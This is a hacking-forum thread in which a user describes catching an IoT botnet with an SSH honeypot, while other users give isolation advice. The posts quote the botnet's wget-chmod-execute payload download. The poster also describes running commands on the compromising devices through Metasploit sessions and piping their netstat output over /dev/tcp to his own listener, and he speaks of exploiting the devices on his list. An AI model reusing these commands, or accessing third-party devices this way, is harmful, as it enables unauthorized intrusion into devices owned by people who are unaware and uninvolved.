i8igmac Posted July 31, 2017 Share Posted July 31, 2017 (edited) Today i noticed my network was a little sluggish, so I checked the tcp stream out of habit. I see login attempts on my home router via ssh. So I quickly installed in virtual-box a light version of ubuntu and then I installed a honeypot. I created a user list of root:x:500-worst-passwords for ssh With some iptable kungfu I directed the attack to the honeypot and boom I see command execution while its happening ; -) This is exciting... The attack was coming from hundreds of LoT devices(webcams/routers/house hold applances) When I seen the commands executed, I see wget http:/Attack-ip-address/y808oe chmod +x y808oe ./y808oe So I download a copy of the file for later research in hopes that it might be 0day... One of my thoughts is the list of lot devices used, I too could could gain access to these devices. I believe this is just a LoT device worm automated to get more devices. Any one have experience or fun with honey pots? Edited July 31, 2017 by i8igmac 1 Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 31, 2017 Share Posted July 31, 2017 So you used their hack to hack your own devices to gain better control of your own devices? That's when you know you were never in control of your own devices..Sad boi. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted July 31, 2017 Author Share Posted July 31, 2017 (edited) 57 minutes ago, Dave-ee Jones said: So you used their hack to hack your own devices to gain better control of your own devices? That's when you know you were never in control of your own devices..Sad boi. No. That was my mistake with the iptable rules. When I attempt to log into the attackers ssh, it was my iptables rules would also forward me back to the vm... oops... None of my devices was hacked. I setup a honeypot and gave direct acces in hopes to find some private exploits. Edited July 31, 2017 by i8igmac Quote Link to comment Share on other sites More sharing options...
digip Posted July 31, 2017 Share Posted July 31, 2017 Be careful if/when they root the VM box and spread to your real network. When doing this, I'd be running the VM from a throw away box as well, and the rest of your devices offline when the honeypot is on the network. If they escape the VM, they could possibly harm the host machine, and the rest of the network. 1 Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 31, 2017 Share Posted July 31, 2017 12 minutes ago, digip said: Be careful if/when they root the VM box and spread to your real network. When doing this, I'd be running the VM from a throw away box as well, and the rest of your devices offline when the honeypot is on the network. If they escape the VM, they could possibly harm the host machine, and the rest of the network. Yea. Keep the VM's networking off and turn VirtualBox's network capabilities off for that VM, otherwise, as Digip said, there will be issues.. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted July 31, 2017 Author Share Posted July 31, 2017 I'm not so worried, it looks like the rootkit creates a reverse proxy, the honey pot fails to execute The rootkit as per design. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted July 31, 2017 Share Posted July 31, 2017 8 minutes ago, i8igmac said: I'm not so worried, it looks like the rootkit creates a reverse proxy, the honey pot fails to execute The rootkit as per design. Yeah, well, you won't mind if we say "we told you so" if you're whole network gets crypto'd or all your data is deleted or sent online then will you? :P 1 Quote Link to comment Share on other sites More sharing options...
i8igmac Posted July 31, 2017 Author Share Posted July 31, 2017 (edited) 11 minutes ago, Dave-ee Jones said: Yeah, well, you won't mind if we say "we told you so" if you're whole network gets crypto'd or all your data is deleted or sent online then will you? :P Not worried, if you would like a shot just ask. my router is a beast custom build. Ill make this pot a permanent setup. Edited July 31, 2017 by i8igmac Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted August 1, 2017 Share Posted August 1, 2017 18 hours ago, i8igmac said: Not worried, if you would like a shot just ask. my router is a beast custom build. Ill make this pot a permanent setup. I'm actually trying to flash a RP-WD03 with OpenWRT :/ Having numerous problems - mainly I can't get it to talk to my TFTP server and request a kernel.. Quote Link to comment Share on other sites More sharing options...
Forkish Posted August 1, 2017 Share Posted August 1, 2017 On 7/31/2017 at 0:01 AM, i8igmac said: so I checked the tcp stream out of habit. Wireshark? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted August 2, 2017 Author Share Posted August 2, 2017 (edited) 1 hour ago, Spoonish said: Wireshark? I do most of everything from a command line... since my router runs Ubuntu, there is no shortage of tools. Tcpick is a command line tool that uses the same filtering as wire shark. tcpick -I wlp3s0 -C This simply shows each tcp connection made as it happens. then I ran the command below to see port 22 traffic with binary data. Tcpick -i wlp3s0 -yP -C 'dst port 22' I wish i had recorded the hole process. Edited August 2, 2017 by i8igmac Quote Link to comment Share on other sites More sharing options...
roy29 Posted August 2, 2017 Share Posted August 2, 2017 On 7/31/2017 at 6:01 AM, i8igmac said: No. That was my mistake with the iptable rules. When I attempt to log into the attackers ssh, it was my iptables rules would also forward me back to the vm... oops... None of my devices was hacked. I setup a honeypot and gave direct acces in hopes to find some private exploits. Hello guys,how can I help??? Quote Link to comment Share on other sites More sharing options...
Forkish Posted August 5, 2017 Share Posted August 5, 2017 On 8/2/2017 at 5:09 PM, roy29 said: Hello guys,how can I help??? ♪♫♪Roy is here to save the day!♪♫ 1 Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 26, 2017 Author Share Posted October 26, 2017 On 8/5/2017 at 7:03 AM, Spoonish said: ♪♫♪Roy is here to save the day!♪♫ You could help in providing mind bottling theories to solving this question... how do you get shells... The honey pot was fun but here was my next steps I took to exploring this botnet that is attacking my Super-L33t-wifi-router There have been questions around here about seting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public ip... I have answered in this video. If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video. 3 Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 27, 2017 Author Share Posted October 27, 2017 (edited) I found the CnC... all of these devices are connected to the same identicle ip... Its a vpn service... so I guess all that is left to do is contact the vpn service and submit the logs... turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done first i started a listiner that greps for a specific ip... then i sent 2 commands off to all current sessions msf auxiliary(ssh_login) > sessions all -c 'netstat -nt > net' msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888 then the results pour into my netcat listener turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done tcp 0 0 192.168.1.130:42074 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.130:44592 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.10.101:40764 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.10.102:47652 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.1.4:55475 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.4:39033 217.23.5.33:443 CLOSE_WAIT tcp 0 0 192.168.1.103:47597 217.23.5.33:443 ESTABLISHED tcp 0 0 192.168.1.103:56610 217.23.5.33:443 CLOSE_WAIT i could turn this into a metasploit module or resource script. Edited October 27, 2017 by i8igmac Quote Link to comment Share on other sites More sharing options...
i8igmac Posted October 28, 2017 Author Share Posted October 28, 2017 On 10/27/2017 at 9:02 AM, kdodge said: on some *nix you can run netstat with the -p option to get the Process that is creating the connection. That might get you the backdoor that he is using. netstat -ntp yah its random generated application name. 217.23.5.33:443 ESTABLISHED agy46jk87 Quote Link to comment Share on other sites More sharing options...
NanoCoder Posted February 10, 2018 Share Posted February 10, 2018 Can you upload the entire file? Quote Link to comment Share on other sites More sharing options...
VirtualBoxVM Posted March 13, 2018 Share Posted March 13, 2018 I've been receiving random tcp traffic from unknown ips. I'm not sure if I should be worried or not. I'm nowhere near a pro at network security but I'm learning everyday. Should I try to protect myself? I hardly browse internet an never attack anyone. So I'm confused on how I'm getting random tcp connections. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted March 13, 2018 Share Posted March 13, 2018 Is 217.23.5.33 the actual IP? If so, it probably means the hacker bought a server off of Worldstream (owner of IP) and is using it to hack your network. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted March 14, 2018 Author Share Posted March 14, 2018 (edited) 14 hours ago, Dave-ee Jones said: Is 217.23.5.33 the actual IP? If so, it probably means the hacker bought a server off of Worldstream (owner of IP) and is using it to hack your network. Yah. I email the admin. They respond appropriately asking for detailed information of the attack. but I decided I want to keep my honey pot running hoping to capture private exploits and log as many ip's as possible. The list is big. All easily exploitable Edited March 14, 2018 by i8igmac Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.